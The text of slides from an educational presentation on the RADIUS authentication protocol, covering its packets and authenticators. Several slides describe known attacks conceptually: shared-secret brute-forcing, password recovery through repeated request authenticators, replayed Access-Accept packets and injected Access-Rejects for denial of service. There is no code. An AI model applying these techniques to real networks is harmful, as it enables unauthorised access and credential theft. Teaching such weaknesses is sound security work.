RADIUS
RADIUS 2
In This Presentation…
Why Do We Need It?
What is RADIUS?
RADIUS Operation
RADIUS Packets
Operation Examples
Attacks on RADIUS
RADIUS’ EAP Support
RADIUS 3
Why Do We Need It?
Embedded Network Devices
Multiple Users & WorkstationsSimple Network Access Servers (NAS)Central User AdministrationUser Roaming
Protection Against Sniffing / Active Attacker
RADIUS 4
What is RADIUS?
Remote Authentication Dial-In User Service
Key Features: Client / Server Model Network Security Flexible Authentication Methods Extensible Protocol
De-Facto Standard For Remote Authentication
RADIUS 5
What is RADIUS?
Application
TCP / UDP
IP
Link
Physical
RADIUS
RADIUS 6
RADIUS Operation
RADIUS Server
RADIUS Client(NAS – Network Access Server)
Dial-In User
LAN / WAN
Dial-In
RADIUS 7
RADIUS Operation
RADIUS Uses UDP. Why?Significantly Different Timing Requirements
However, retransmission capabilities are still needed
Stateless ProtocolClients and servers come and go
Simplifies Server Implementation
Keep-Alives Considered Harmful
RADIUS 8
RADIUS Operation
Operation ModesUser-Name / PasswordChallenge / Response Interoperation with PAP and CHAPProxy
RADIUS 9
RADIUS Packets1 Byte 1 Byte 2 Bytes
Code Identifier Length
Authenticator
Attributes…
4 Words
RADIUS 10
RADIUS Packets
Packet TypesAccess-RequestAccess-AcceptAccess-RejectAccess-Challenge
RADIUS 11
RADIUS Packets
The AuthenticatorRequest Authenticator
Unpredictable and unique over the lifetime of a secret
Used for user-password hidingResponse Authenticator
Calculated by an MD-5 hash:
MD5(Code + ID + Length + RequestAuth + Attributes + Secret)
RADIUS 12
Examples
User Telnet To Specified Host
User Authenticating With CHAP
User With Challenge-Response Card
RADIUS 13
Attacks On RADIUS
Weaknesses Of The Protocol
Operation ModesUser Name / Password ModeChallenge / Response Mode
RADIUS 14
Attacks On RADIUS
Response Authenticator Based Shared Secret Attack Attacker listens to requests and server responses,
and pre-compute MD5 state, which is the prefix of the response authenticator:
MD5(Code+ID+Length+ReqAuth+Attrib) Perform an exhaustive search on shared secret,
adding it to the above MD5 state each time. Many implementations receive shared secret as an
ASCII string from keyboard, and limit size to 16 bytes.
RADIUS 15
Attacks On RADIUS
User-Password Attribute Based Shared Secret Attack The attacker attempts a connection to the NAS,
and intercepts the access-request. XORs the user password attribute with the
password he used to obtain:MD5(Secret+ReqAuth)
Perform an exhaustive search on shared secret. Cannot pre-compute MD5 state. Finding the MD5 value, is useful for other attacks.
RADIUS 16
Attacks On RADIUS
User-Password Based Password Attack The attacker attempts a connection to the NAS,
intercepts the access-request and computes MD5(Secret+ReqAuth).
Performs an exhaustive / dictionary attack on password, XORing it with above MD5 and sending it each time in appropriate attribute.
Bypasses any login restriction imposed by NAS.
Possible due to no authentication on request packet.
RADIUS 17
Attacks On RADIUS
Request Authenticator Based AttacksPossible due to bad implementations:
Poor Pseudo Random Number GeneratorPredictable Request ID
RADIUS 18
Attacks On RADIUS
Request Authenticator Based Attacks Passive User-Password Compromise through
Repeated Request Authenticators Attacker builds a dictionary of ReqAuth and user-
password attribute sent by NAS. When a ReqAuth repeats itself, attacker can XOR user-
password attributes and obtain:
password1 XOR password2
Perform a dictionary attack, combined with the fact that the longer password is padded with 0’s, causing the other password’s characters XORed with it to remain unchanged.
RADIUS 19
Attacks On RADIUS
Request Authenticator Based AttacksActive User-Password Compromise
through Repeated Request AuthenticatorsAttacker builds a dictionary as before.When he predicts he can cause NAS to use a
certain ReqAuth, he tries to connect it and intercepts access-request.
Calculates “password1 XOR password2”, but this time password2 is known, thus user password is compromised.
RADIUS 20
Attacks On RADIUS
Request Authenticator Based Attacks Replay of Server Responses through Repeated
Request Authenticators The attacker builds a dictionary with ReqAuth, ID and
entire server response. Most server responses will be access-accept. The attacker will attempt a connection to NAS, predicting
the ReqAuth and ID, intercept the access-request, and inject the NAS with the packet from the dictionary which is an access-accept, and has same ReqAuth and ID.
RADIUS 21
Attacks On RADIUS
Request Authenticator Based AttacksDoS Arising from the Prediction of the
Request AuthenticatorMuch like previous attack.This time, attacker connects to NAS many
times, and building same dictionary as before, only this time with access-rejects.
When user tries to connect, and NAS uses repeated ReqAuth, the attacker injects his access-reject, causing a denial of service.
RADIUS 22
Attacks On RADIUS
SummaryUser-Password Protection TechniqueThe Response-AuthenticatorAccess-Request PacketsRandom Number GeneratorsShared Secrets
RADIUS 23
RADIUS’ EAP Support
RADIUS-Encapsulated EAP Packets
Proprietary Protocol Between RADIUS Server and Backend Security Server
Proxied RADIUS requests
Retransmission and Fragmentation Issues
RADIUS 24
RADIUS’ EAP Support
Security ConsiderationsSeparation of EAP Server and PPP
AuthenticatorConnection HijackingMan-in-the-Middle AttackMultiple DatabasesNegotiation Attacks
RADIUS 25
Conclusion
RADIUS is a remote authentication protocol.RADIUS is a de-facto standard for remote authentication.RADIUS has several weaknesses.RADIUS is an extensible protocol, and can support many authentication methods (e.g. EAP).
RADIUS 26
What Next?
Diameter"Diameter clients, such as Network Access
Servers (NASes) and Foreign Agents MUST support IP Security, and MAY support TLS. Diameter servers MUST support TLS, but the administrator MAY opt to configure IPSec instead of using TLS. Operating the Diameter protocol without any security mechanism is not recommended."
RADIUS 27
Questions
?